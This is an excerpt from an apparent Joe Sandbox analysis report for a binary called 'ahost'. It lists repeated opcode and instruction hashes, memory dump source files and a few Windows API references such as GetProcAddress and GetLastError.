                                                                                                                                                                                                                              • Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                              • Instruction ID: 26e4667c2d8d043319e89d91337919d639174f6ee943e6cc287339c5347198ec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CCB09220E17A02C6FF483F216CC226862B47F48B00FD80278C02D80378DE2C24E55760
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                              • Instruction ID: bf9400c3b169173d8a6fe8538452751e743b18510a34117673b05f8ea02093a9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9ED1B962D0864A85EB68AE25A85023DA370BF45B9CF944235CF3D0B7D9FF2DD546C3A0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                              • Instruction ID: 5005129a6f9b3517bf20500e92e024f3860dabcc3d165a3769e7374e83f45660
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4C1CD726181E08BD289EA29E86947A73E1F78930DBD5406BEF87477C5C63CA414DB60
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                              • Instruction ID: b8523f2019a774ded17c65fdcf2a4fec6ad9ae4b0b8f2d829cd7e4582d46a88f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BFB1AC72D18B8985E7649F29E85022CBBB0E749B4CFA40535CB6D473D9EF29D441C7A0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                              • Instruction ID: 7350b212780d8e0a911aea6a00bcd00a464fef4a69b22f5363e6a05176f74b98
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2281F572E0878946D775EF19B84037AAAA1FB85798F904235DBBD43BD9EE3CD4008B50
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: e679193b4f92434cc558a1156ae9b62e5a6ceff8845571a1df199170146ecb9f
                                                                                                                                                                                                                              • Instruction ID: 10b2743b5821b148e974e035e5a7a1398c9d4834646fb399b20da3486ffb3e49
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e679193b4f92434cc558a1156ae9b62e5a6ceff8845571a1df199170146ecb9f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D361FB22E0C19246F7A4AE299C5827DE5A0BF40364F940339D77DC76EDDE6DE80087A0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                              • Instruction ID: e7178ed7aeb3b87d7fd1622e87e40523d62aa3a96ab48f6c9cc0afe5e8b7749f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A517372E1865582EB249F29E44022877B0EB99B6CF644531CF7D077D8EB3AE843C790
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                              • Instruction ID: 75ec88ef8f85a7e98471ed9e571e782e4aa671b34f62f4c8155482695e19cffd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC517336E1865586F7349F29E440228B3B0EB44B6CFA44135CB6D177D8EB7AE843C790
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                              • Instruction ID: 05d9733782dcc976f735c6c08678861b851b69de7688aa35d2ee3324aab89e53
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8519136E1865A86F7359F28E440268B3B0EB44B5CF644235CF6D477D9EB3AE842C790
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                              • Instruction ID: 5d6d023bdbc0fe1534c4be87b565172bb777e8c91143ebc0d88599c8a06cbca7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42519036E1865986F7349F29E484228A7B1EB44B5CFA44131CB7C177D8EB3AE843C790
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                              • Instruction ID: c1c2e0dd7090eea19c8485605ced6c0f4ce26ed69ff0260d9804d5abab504e7c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E51A477E1865585EB249F28E84022977B0EB44B5CFA44531CB6D177ECEB3AEC42C790
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                              • Instruction ID: bd2678a70e456933a16807363aab63aa189ad23d97a762d84df54b4a5c32ba42
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF51BC36E1865982F7349F29E840268A3B1EB44B5CFA44135CB6C177DCEB3AE842C7D0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                              • Instruction ID: 18d41cf61ef01b45c6b0494f8d3117f7e38b379a3a3ec61455a6e326a79be0c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1441EC62C1974E44FB515D281D04678DAA09F62BE8FD812F0CFB9533CBFD2E29478161
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                              • Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                              • Instruction ID: 71bbb9e6909d8f3c540dd0bfadf3e940c67516b214d0ef767e740e938bfa5e7e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57410622B14A5982FF44DF2AED54169B3A1BB48FD4B899132DE2D97B98EE3CD4418340
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
                                                                                                                                                                                                                              • Instruction ID: da990d4cd3b4a39b4c3b296af8a18a08c356a97e02cb0f90357db829d8a4d8df
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B31E632B08B4541FB58AF257C4013DA5A5AB84BD4F844238EB7E93BD9EF3CD0019754
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                              • Instruction ID: 7f1995f2952faec891a77e68d61d7759d4006bcf30a61a58593f3332660e711a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0EF0C8717182568BFB989F68A84266977E0F7083C0F908479E69DC3B58CA3CC0618F54
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                              • Instruction ID: 729c1c330d77f8dfaa9247ca4c25568c3188f13eea0682bc1a7ffb80d83eeddf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42A00165A0C80AD5EB95AF10BC90029A330BB50300B840031E02E820F89E2CA80493A1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E5830
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E5842
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E5879
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E588B
